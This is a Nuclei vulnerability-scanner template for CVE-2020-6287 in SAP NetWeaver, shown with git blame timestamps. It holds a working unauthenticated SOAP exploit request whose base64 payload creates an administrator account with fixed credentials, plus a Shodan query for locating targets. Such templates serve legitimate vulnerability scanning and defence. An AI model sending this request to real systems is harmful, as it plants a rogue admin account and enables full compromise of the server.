nuclei-templates/http/cves/2020/CVE-2020-6287.yaml

66 lines
4.4 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-6287
2020-07-21 06:53:00 +00:00
info:
name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition
2020-07-21 06:53:00 +00:00
author: dwisiswant0
severity: critical
description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability allows an attacker to gain unauthorized administrative access to the SAP system.
2023-09-06 12:22:36 +00:00
remediation: |
Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability.
2021-03-16 15:10:36 +00:00
reference:
- https://launchpad.support.sap.com/#/notes/2934135
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
2021-06-05 04:59:59 +00:00
- https://github.com/chipik/SAP_RECON
- https://nvd.nist.gov/vuln/detail/CVE-2020-6287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2020-6287
cwe-id: CWE-306
epss-score: 0.97274
epss-percentile: 0.99828
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:*
2022-07-21 18:26:57 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: sap
product: netweaver_application_server_java
2023-09-06 12:22:36 +00:00
shodan-query: http.favicon.hash:-266008933
2023-07-12 11:56:50 +00:00
tags: cve,cve2020,sap,kev
2020-07-21 06:53:00 +00:00
http:
2021-06-05 06:45:32 +00:00
- raw:
2020-07-21 06:53:00 +00:00
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
2020-07-21 08:00:14 +00:00
Connection: close
2020-07-21 06:53:00 +00:00
2021-06-05 06:45:32 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
2020-07-21 06:53:00 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2020-07-21 06:53:00 +00:00
words:
2021-06-05 04:59:59 +00:00
- "CTCWebServiceSi"
- "SOAP-ENV"
condition: and
2021-05-05 11:56:14 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-05-05 11:56:14 +00:00
words:
- "text/xml"
2021-06-05 04:59:59 +00:00
- "SAP NetWeaver Application Server"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# userName - sapRpoc6351
2023-10-14 11:27:55 +00:00
# password - Secure!PwD8890
# digest: 4b0a00483046022100b19a292d073707c2a62a60266109e8184180be7aac276b0ece9e1f5ab05a11f8022100a41ce09247707ac7505935a8526cd615a99b19a858609d205e04fb959598ec6a:922c64590222798bb761d5b6d8e72950